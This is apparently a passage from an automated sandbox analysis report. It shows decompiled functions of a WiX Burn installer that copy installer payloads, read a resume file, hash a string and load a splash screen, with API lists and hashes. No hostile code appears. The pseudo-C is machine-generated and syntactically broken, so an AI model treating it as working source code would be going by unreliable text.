                                                                                                                                                                  0x00407e92
                                                                                                                                                                  0x00407e95
                                                                                                                                                                  0x00407e9a
                                                                                                                                                                  0x00407ea0
                                                                                                                                                                  0x00407ea2
                                                                                                                                                                  0x00407ea5
                                                                                                                                                                  0x00407ea7
                                                                                                                                                                  0x00407eb2
                                                                                                                                                                  0x00407f00
                                                                                                                                                                  0x00407f10
                                                                                                                                                                  0x00407f15
                                                                                                                                                                  0x00407f17
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407eb4
                                                                                                                                                                  0x00407eb4
                                                                                                                                                                  0x00407eb5
                                                                                                                                                                  0x00407eb8
                                                                                                                                                                  0x00407eb8
                                                                                                                                                                  0x00407ebd
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,0040223F,000000FF,004021A3,00402283,00401DDF,00000000,00401EAB,0040223F,0040227F,004021A3,004021A7,00401F17), ref: 00407DED
                                                                                                                                                                  Strings
                                                                                                                                                                  • Payload was not found in container: %ls, xrefs: 00407F17
                                                                                                                                                                  • Failed to concat file paths., xrefs: 00407EE8
                                                                                                                                                                  • Failed to get next stream., xrefs: 00407EF9
                                                                                                                                                                  • Failed to get directory portion of local file path, xrefs: 00407EE1
                                                                                                                                                                  • Failed to find embedded payload: %ls, xrefs: 00407EF2
                                                                                                                                                                  • Failed to extract file., xrefs: 00407ECB
                                                                                                                                                                  • Failed to ensure directory exists, xrefs: 00407ED2
                                                                                                                                                                  • payload.cpp, xrefs: 00407F0B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                  • API String ID: 1825529933-1711239286
                                                                                                                                                                  • Opcode ID: 60a90c6fb80e5f63e41a217f44e421bc4af4f59a78ce993618baca79df0c869d
                                                                                                                                                                  • Instruction ID: af8b5e66ab837dc1f61522e2b4aea987b3af3f3ffa603aec968b5071cfad2356
                                                                                                                                                                  • Opcode Fuzzy Hash: 60a90c6fb80e5f63e41a217f44e421bc4af4f59a78ce993618baca79df0c869d
                                                                                                                                                                  • Instruction Fuzzy Hash: 1651C131D0A225EBCB119F55C841AAEBBB4BF44710F2081BBE9017B2D1D378AD41DBDA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004203C0, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 124COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                  			E004203C0(void* __ecx, void* _a4, WCHAR* _a8, WCHAR* _a12) {
				long _v8;
				intOrPtr* _t22;
				void* _t24;
				signed short _t29;
				signed short _t31;
				signed int _t36;
				long _t37;
				signed short _t39;
				intOrPtr _t46;
				WCHAR* _t47;
				signed short _t50;
				intOrPtr _t52;
				void* _t54;
				long _t57;
				signed short _t61;

				_push(__ecx);
				_t54 = _a4;
				_t57 = 0;
				_t22 =  *((intOrPtr*)(_t54 + 4));
				_v8 = 0;
				_t46 = 0x43b580;
				if(_t22 == 0) {
					_t50 =  *(_t54 + 8);
					__eflags = _t50;
					if(__eflags == 0) {
						_t52 = 0x43b580;
					} else {
						_t52 =  *_t50;
					}
				} else {
					_t52 =  *_t22;
				}
				_t51 =  *((intOrPtr*)(_t54 + 0xc));
				if(_t51 != 0) {
					_t46 =  *_t51;
				}
				if(_t22 == 0) {
					__eflags =  *(_t54 + 8) - _t57;
					_t51 = 0x20000152;
					_t24 =  !=  ? 0x20000152 : 0x2000014f;
				} else {
					_t72 = _t51;
					_t24 = (0 | _t51 != 0x00000000) + 0x20000150;
				}
				_push(_a8);
				_push("copy");
				_push(_t46);
				E00402003(2, _t24, _t52);
				_t47 = _a12;
				if(E00436AF7(_t51, _t72, _t47,  &_v8) == 0) {
					L14:
					_t17 = _t54 + 0x20; // 0x20
					_t29 = CopyFileExW(_a8, _t47, E004202B5, _t54, _t17, _t57);
					__eflags = _t29;
					if(_t29 == 0) {
						__eflags =  *(_t54 + 0x20) - _t57;
						if( *(_t54 + 0x20) == _t57) {
							_t31 = GetLastError();
							__eflags = _t31;
							_t61 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							__eflags = _t61;
							_t57 =  >=  ? 0x80004005 : _t61;
							E004300D9(0x80004005, "apply.cpp", 0x54e, _t57);
							_push(_t47);
							_push(_a8);
							_push("Failed attempt to copy payload from: \'%ls\' to: %ls.");
						} else {
							_t57 = 0x80070642;
							E004300D9(_t29, "apply.cpp", 0x54a, 0x80070642);
							_push(_t47);
							_push(_a8);
							_push("BA aborted copy of payload from: \'%ls\' to: %ls.");
						}
						_push(_t57);
						E00430A57();
					}
					goto L19;
				} else {
					_t36 = _v8;
					if((_t36 & 0x00000001) == 0) {
						goto L14;
					}
					_t37 = _t36 & 0xfffffffe;
					_v8 = _t37;
					if(SetFileAttributesW(_t47, _t37) != 0) {
						goto L14;
					}
					_t39 = GetLastError();
					_t64 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
					_t57 =  >=  ? 0x80004005 :  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "apply.cpp", 0x540, _t57);
					E00430A57(_t57, "Failed to clear readonly bit on payload destination path: %ls", _t47);
					L19:
					return _t57;
				}
			}


















                                                                                                                                                                  0x004203c3
                                                                                                                                                                  0x004203c7
                                                                                                                                                                  0x004203ca
                                                                                                                                                                  0x004203cc
                                                                                                                                                                  0x004203cf
                                                                                                                                                                  0x004203d2
                                                                                                                                                                  0x004203d9
                                                                                                                                                                  0x004203df
                                                                                                                                                                  0x004203e2
                                                                                                                                                                  0x004203e4
                                                                                                                                                                  0x004203ea
                                                                                                                                                                  0x004203e6
                                                                                                                                                                  0x004203e6
                                                                                                                                                                  0x004203e6
                                                                                                                                                                  0x004203db
                                                                                                                                                                  0x004203db
                                                                                                                                                                  0x004203db
                                                                                                                                                                  0x004203ec
                                                                                                                                                                  0x004203f1
                                                                                                                                                                  0x004203f3
                                                                                                                                                                  0x004203f3
                                                                                                                                                                  0x004203f7
                                                                                                                                                                  0x00420407
                                                                                                                                                                  0x0042040f
                                                                                                                                                                  0x00420412
                                                                                                                                                                  0x004203f9
                                                                                                                                                                  0x004203fb
                                                                                                                                                                  0x00420400
                                                                                                                                                                  0x00420400
                                                                                                                                                                  0x00420415
                                                                                                                                                                  0x00420418
                                                                                                                                                                  0x0042041d
                                                                                                                                                                  0x00420422
                                                                                                                                                                  0x00420427
                                                                                                                                                                  0x00420439
                                                                                                                                                                  0x00420493
                                                                                                                                                                  0x00420494
                                                                                                                                                                  0x004204a2
                                                                                                                                                                  0x004204a8
                                                                                                                                                                  0x004204aa
                                                                                                                                                                  0x004204ac
                                                                                                                                                                  0x004204af
                                                                                                                                                                  0x004204d1
                                                                                                                                                                  0x004204e0
                                                                                                                                                                  0x004204e2
                                                                                                                                                                  0x004204ea
                                                                                                                                                                  0x004204ec
                                                                                                                                                                  0x004204fa
                                                                                                                                                                  0x004204ff
                                                                                                                                                                  0x00420500
                                                                                                                                                                  0x00420503
                                                                                                                                                                  0x004204b1
                                                                                                                                                                  0x004204b1
                                                                                                                                                                  0x004204c1
                                                                                                                                                                  0x004204c6
                                                                                                                                                                  0x004204c7
                                                                                                                                                                  0x004204ca
                                                                                                                                                                  0x004204ca
                                                                                                                                                                  0x00420508
                                                                                                                                                                  0x00420509
                                                                                                                                                                  0x0042050e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042043b
                                                                                                                                                                  0x0042043b
                                                                                                                                                                  0x00420440
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420442
                                                                                                                                                                  0x00420447
                                                                                                                                                                  0x00420452
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420454
                                                                                                                                                                  0x00420465
                                                                                                                                                                  0x0042046f
                                                                                                                                                                  0x0042047d
                                                                                                                                                                  0x00420489
                                                                                                                                                                  0x00420511
                                                                                                                                                                  0x00420517
                                                                                                                                                                  0x00420517

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000002,00000000,00000002,00000000,?,?,?,00000002,00000000,00000000,?,?,004216F9,?,00000001,00000000), ref: 0042044A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000002,00000000,00000000,?,?,004216F9,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00420454
                                                                                                                                                                  • CopyFileExW.KERNEL32(00000002,00000002,004202B5,00000000,00000020,00000000,00000002,00000000,?,?,?,00000002,00000000,00000000), ref: 004204A2
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000002,00000000,00000000,?,?,004216F9,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 004204D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                                                  • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                                                                  • API String ID: 1969131206-836986073
                                                                                                                                                                  • Opcode ID: 56e4219a89a8ff47d8d6136928a796f6201c8b2cfb16e3596f976df49e025c21
                                                                                                                                                                  • Instruction ID: 0f9840f5b1fe56266f56d8fad70d032d738c8dda4a0851daa1574958319ed0be
                                                                                                                                                                  • Opcode Fuzzy Hash: 56e4219a89a8ff47d8d6136928a796f6201c8b2cfb16e3596f976df49e025c21
                                                                                                                                                                  • Instruction Fuzzy Hash: E831E471B00625BBF710AA66AC85F7B72ECEF08755B50812BBD05E7282D779CD0186EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004254B6, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 110fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E004254B6(void* __ecx, intOrPtr _a4, WCHAR** _a8, void** _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* _t24;
				signed short _t28;
				signed short _t36;
				signed int* _t42;
				intOrPtr _t45;
				WCHAR** _t48;
				void* _t49;
				void* _t52;

				_t42 = _a16;
				_t48 = _a8;
				_v8 = 0;
				_v12 = 0;
				 *_t42 = 0;
				_t42[1] = 0;
				_t52 = E00413C6F(_a4, _t48);
				if(_t52 >= 0) {
					_t49 = CreateFileW( *_t48, 0xc0000000, 4, 0, 4, 0x80, 0);
					if(_t49 != 0xffffffff) {
						_t45 = _v8;
						while(1) {
							_push(0);
							_push( &_v12);
							_t24 = 8;
							if(ReadFile(_t49, _t45 + _t42, _t24 - _t45, ??, ??) == 0) {
								break;
							}
							_t45 = _v8 + _v12;
							_v8 = _t45;
							if(_v12 == 0 || _t45 >= 8) {
								if(_t45 != 8) {
									 *_t42 =  *_t42 & 0x00000000;
									_t42[1] = _t42[1] & 0x00000000;
								}
								 *_a12 = _t49;
								_t49 = _t49 | 0xffffffff;
								L13:
								if(_t49 != 0xffffffff) {
									CloseHandle(_t49);
								}
								L15:
								return _t52;
							} else {
								continue;
							}
						}
						_t28 = GetLastError();
						_t55 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
						_t52 =  >=  ? 0x80004005 :  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "downloadengine.cpp", 0xda, _t52);
						E00430A57(_t52, "Failed to read resume file: %ls",  *_a8);
						goto L13;
					}
					_t36 = GetLastError();
					_t59 =  <=  ? _t36 : _t36 & 0x0000ffff | 0x80070000;
					_t52 =  >=  ? 0x80004005 :  <=  ? _t36 : _t36 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "downloadengine.cpp", 0xd3, _t52);
					_push( *_a8);
					_push("Failed to create resume file: %ls");
					L2:
					_push(_t52);
					E00430A57();
					goto L15;
				}
				_push(_a4);
				_push("Failed to calculate resume path from working path: %ls");
				goto L2;
			}













                                                                                                                                                                  0x004254bc
                                                                                                                                                                  0x004254c1
                                                                                                                                                                  0x004254ca
                                                                                                                                                                  0x004254cd
                                                                                                                                                                  0x004254d0
                                                                                                                                                                  0x004254d2
                                                                                                                                                                  0x004254da
                                                                                                                                                                  0x004254de
                                                                                                                                                                  0x00425510
                                                                                                                                                                  0x00425515
                                                                                                                                                                  0x00425551
                                                                                                                                                                  0x00425554
                                                                                                                                                                  0x00425554
                                                                                                                                                                  0x00425559
                                                                                                                                                                  0x0042555c
                                                                                                                                                                  0x0042556d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425572
                                                                                                                                                                  0x00425579
                                                                                                                                                                  0x0042557c
                                                                                                                                                                  0x00425586
                                                                                                                                                                  0x00425588
                                                                                                                                                                  0x0042558b
                                                                                                                                                                  0x0042558b
                                                                                                                                                                  0x00425592
                                                                                                                                                                  0x00425594
                                                                                                                                                                  0x004255da
                                                                                                                                                                  0x004255dd
                                                                                                                                                                  0x004255e0
                                                                                                                                                                  0x004255e0
                                                                                                                                                                  0x004255e6
                                                                                                                                                                  0x004255ec
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042557c
                                                                                                                                                                  0x00425599
                                                                                                                                                                  0x004255aa
                                                                                                                                                                  0x004255b4
                                                                                                                                                                  0x004255c2
                                                                                                                                                                  0x004255d2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004255d7
                                                                                                                                                                  0x00425517
                                                                                                                                                                  0x00425528
                                                                                                                                                                  0x00425532
                                                                                                                                                                  0x00425540
                                                                                                                                                                  0x00425548
                                                                                                                                                                  0x0042554a
                                                                                                                                                                  0x004254e8
                                                                                                                                                                  0x004254e8
                                                                                                                                                                  0x004254e9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004254ee
                                                                                                                                                                  0x004254e0
                                                                                                                                                                  0x004254e3
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000000,75C08550,?,?,?,00425DB5), ref: 0042550A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00425DB5,?,?,000000FF,?,?,?,00000078,00000000,00000000,?,?,?), ref: 00425517
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000008,00000008,00000000,00000000,?,?,?,00425DB5,?,?,000000FF,?,?,?,00000078), ref: 00425565
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00425DB5,?,?,000000FF,?,?,?,00000078,00000000,00000000,?,?,?), ref: 00425599
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,WiX\Burn,DownloadTimeout,00000078,?), ref: 004255E0
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create resume file: %ls, xrefs: 0042554A
                                                                                                                                                                  • downloadengine.cpp, xrefs: 0042553B, 004255BD
                                                                                                                                                                  • Failed to calculate resume path from working path: %ls, xrefs: 004254E3
                                                                                                                                                                  • Failed to read resume file: %ls, xrefs: 004255CC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                  • String ID: Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to read resume file: %ls$downloadengine.cpp
                                                                                                                                                                  • API String ID: 3160720760-919322122
                                                                                                                                                                  • Opcode ID: 1869560bf48bc83ee5751bd7061e81349eb168691e153f30b478099af5cb8f99
                                                                                                                                                                  • Instruction ID: fc5a16695955bf73d266ea5bec4604439a4f7e92c7ebd3acd4e958904c9fed18
                                                                                                                                                                  • Opcode Fuzzy Hash: 1869560bf48bc83ee5751bd7061e81349eb168691e153f30b478099af5cb8f99
                                                                                                                                                                  • Instruction Fuzzy Hash: A231FA71B00620BFEB209F69EC45B6E77A5EF05751F114216FD01EB2D0D778894087A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A4E0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E1001A4E0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				signed int _v8;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebp;
				void* _t36;
				void* _t75;
				void* _t80;
				void* _t81;

				_t74 = __esi;
				_t73 = __edi;
				_t57 = __ebx;
				_v8 = 0;
				_v176 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x10);
				_v168 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x21);
				E1000CF80(__edi, _v168, 0, 0x21);
				E1000CF80(_t73, _v176, 0, 0x10);
				_t67 = _a4;
				_t36 = E1000CAD0(_a4);
				_t80 = _t75 + 0x24;
				if(_t36 <= 0) {
					E1000E2E0(_v168, "00000000000000000000000000000000");
					_t81 = _t80 + 8;
				} else {
					E1001BC70( &_v164);
					E1001CB20( &_v164, _a4, E1000CAD0(_a4));
					_t67 =  &_v164;
					E1001CC20( &_v164, _v176);
					_t81 = _t80 + 0x1c;
					_v8 = 0;
					while(_v8 < 0x10) {
						_t67 = _v168 + _v8 * 2;
						E1000CCA3(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
						_t81 = _t81 + 0xc;
						_v8 = _v8 + 1;
					}
				}
				_push(_v176);
				E1000CA40(_t57, _t73, _t74, __eflags);
				_v172 = L1000CEAF(_t57, _t67, _t73, _t74, 0x11);
				E1000CF80(_t73, _v172, 0, 0x11);
				__eflags = _v168 + 8;
				E1000D1F0(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
				_push(_v168);
				E1000CA40(_t57, _t73, _t74, __eflags);
				return _v172;
			}













                                                                                                                                                                  0x1001a4e0
                                                                                                                                                                  0x1001a4e0
                                                                                                                                                                  0x1001a4e0
                                                                                                                                                                  0x1001a4e9
                                                                                                                                                                  0x1001a4fa
                                                                                                                                                                  0x1001a50a
                                                                                                                                                                  0x1001a51b
                                                                                                                                                                  0x1001a52e
                                                                                                                                                                  0x1001a536
                                                                                                                                                                  0x1001a53a
                                                                                                                                                                  0x1001a53f
                                                                                                                                                                  0x1001a544
                                                                                                                                                                  0x1001a5e4
                                                                                                                                                                  0x1001a5e9
                                                                                                                                                                  0x1001a54a
                                                                                                                                                                  0x1001a551
                                                                                                                                                                  0x1001a571
                                                                                                                                                                  0x1001a580
                                                                                                                                                                  0x1001a587
                                                                                                                                                                  0x1001a58c
                                                                                                                                                                  0x1001a58f
                                                                                                                                                                  0x1001a5a1
                                                                                                                                                                  0x1001a5c8
                                                                                                                                                                  0x1001a5cc
                                                                                                                                                                  0x1001a5d1
                                                                                                                                                                  0x1001a59e
                                                                                                                                                                  0x1001a59e
                                                                                                                                                                  0x1001a5d6
                                                                                                                                                                  0x1001a5f2
                                                                                                                                                                  0x1001a5f3
                                                                                                                                                                  0x1001a605
                                                                                                                                                                  0x1001a616
                                                                                                                                                                  0x1001a626
                                                                                                                                                                  0x1001a631
                                                                                                                                                                  0x1001a63f
                                                                                                                                                                  0x1001a640
                                                                                                                                                                  0x1001a651

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                                  • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                                  • API String ID: 796335831-606320477
                                                                                                                                                                  • Opcode ID: 1038390b883c05b411ff430f9458984f015da90a2c3e3efe0500212fe4d55d5b
                                                                                                                                                                  • Instruction ID: 0e7775b8e07c3591b5db09e074d1c70b9db2800ece633bf375f61c4185d71463
                                                                                                                                                                  • Opcode Fuzzy Hash: 1038390b883c05b411ff430f9458984f015da90a2c3e3efe0500212fe4d55d5b
                                                                                                                                                                  • Instruction Fuzzy Hash: B23131B9E0031CAFEB10D760DC42F9E7775DB85304F0444A4F5496B246EA71AA949B93
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004170C3, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 102windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E004170C3(struct HINSTANCE__* _a4, void** _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagMONITORINFO _v48;
				struct tagPOINT _v56;
				void* _v72;
				void* _v76;
				void _v80;
				void* __edi;
				void* __esi;
				signed int _t33;
				int _t36;
				void* _t38;
				struct HMONITOR__* _t44;
				signed short _t60;
				void** _t64;
				signed int _t65;
				void* _t67;
				struct HINSTANCE__* _t75;
				void* _t78;
				void* _t79;
				void* _t80;
				signed int _t84;

				_t33 =  *0x4560d0; // 0xae480e18
				_v8 = _t33 ^ _t84;
				_t75 = _a4;
				_t64 = _a8;
				_t65 = 6;
				_t36 = memset( &_v80, 0, _t65 << 2);
				_t67 = 0xa;
				_t80 = 0;
				_t78 =  &_v48;
				_v56.x = 0;
				_v56.y = 0;
				memset(_t78, _t36, 0 << 2);
				_t79 = _t78 + _t67;
				_t38 = LoadBitmapW(_t75, 1);
				 *_t64 = _t38;
				if(_t38 != 0) {
					GetObjectW(_t38, 0x18,  &_v80);
					_t64[1] = 0x80000000;
					_t64[2] = 0x80000000;
					_t64[3] = _v76;
					_t64[4] = _v72;
					_t44 = GetCursorPos( &_v56);
					if(_t44 != 0) {
						__imp__MonitorFromPoint(_v56.x, _v56.y, 2);
						if(_t44 != 0) {
							_v48.cbSize = 0x28;
							if(GetMonitorInfoW(_t44,  &_v48) != 0) {
								asm("cdq");
								_t64[1] = (_v20 - _t64[3] - _v48.rcWork - _t75 >> 1) + _v48.rcWork;
								asm("cdq");
								_t64[2] = (_v16 - _t64[4] - _v24 - _t75 >> 1) + _v24;
							}
						}
					}
				} else {
					_t60 = GetLastError();
					_t83 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					_t80 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "splashscreen.cpp", 0xf3, _t80);
					_push("Failed to load splash screen bitmap.");
					_push(_t80);
					E00430A57();
				}
				return L004267AF(_t80, _v8 ^ _t84, _t79, _t80);
			}



























                                                                                                                                                                  0x004170c9
                                                                                                                                                                  0x004170d0
                                                                                                                                                                  0x004170d3
                                                                                                                                                                  0x004170d7
                                                                                                                                                                  0x004170de
                                                                                                                                                                  0x004170e6
                                                                                                                                                                  0x004170e8
                                                                                                                                                                  0x004170eb
                                                                                                                                                                  0x004170ed
                                                                                                                                                                  0x004170f1
                                                                                                                                                                  0x004170f4
                                                                                                                                                                  0x004170f7
                                                                                                                                                                  0x004170f7
                                                                                                                                                                  0x004170f9
                                                                                                                                                                  0x004170ff
                                                                                                                                                                  0x00417103
                                                                                                                                                                  0x0041714c
                                                                                                                                                                  0x00417157
                                                                                                                                                                  0x0041715a
                                                                                                                                                                  0x00417160
                                                                                                                                                                  0x00417166
                                                                                                                                                                  0x0041716d
                                                                                                                                                                  0x00417175
                                                                                                                                                                  0x0041717f
                                                                                                                                                                  0x00417187
                                                                                                                                                                  0x0041718e
                                                                                                                                                                  0x0041719d
                                                                                                                                                                  0x004171a8
                                                                                                                                                                  0x004171b0
                                                                                                                                                                  0x004171bc
                                                                                                                                                                  0x004171c4
                                                                                                                                                                  0x004171c4
                                                                                                                                                                  0x0041719d
                                                                                                                                                                  0x00417187
                                                                                                                                                                  0x00417105
                                                                                                                                                                  0x00417105
                                                                                                                                                                  0x00417116
                                                                                                                                                                  0x00417120
                                                                                                                                                                  0x0041712e
                                                                                                                                                                  0x00417133
                                                                                                                                                                  0x00417138
                                                                                                                                                                  0x00417139
                                                                                                                                                                  0x0041713f
                                                                                                                                                                  0x004171d7

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadBitmapW.USER32 ref: 004170F9
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417105
                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0041714C
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0041716D
                                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0041717F
                                                                                                                                                                  • GetMonitorInfoW.USER32 ref: 00417195
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                                                                  • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                                                                                                                                  • API String ID: 2342928100-598475503
                                                                                                                                                                  • Opcode ID: 34cd428255bf90af31af52cef1b95fab7a9fc3b203366189d0c4d7b370d05086
                                                                                                                                                                  • Instruction ID: 1b011324ee609301b53d9b178e90619b304c2a8141791c40f3ac01c4d621cd5b
                                                                                                                                                                  • Opcode Fuzzy Hash: 34cd428255bf90af31af52cef1b95fab7a9fc3b203366189d0c4d7b370d05086
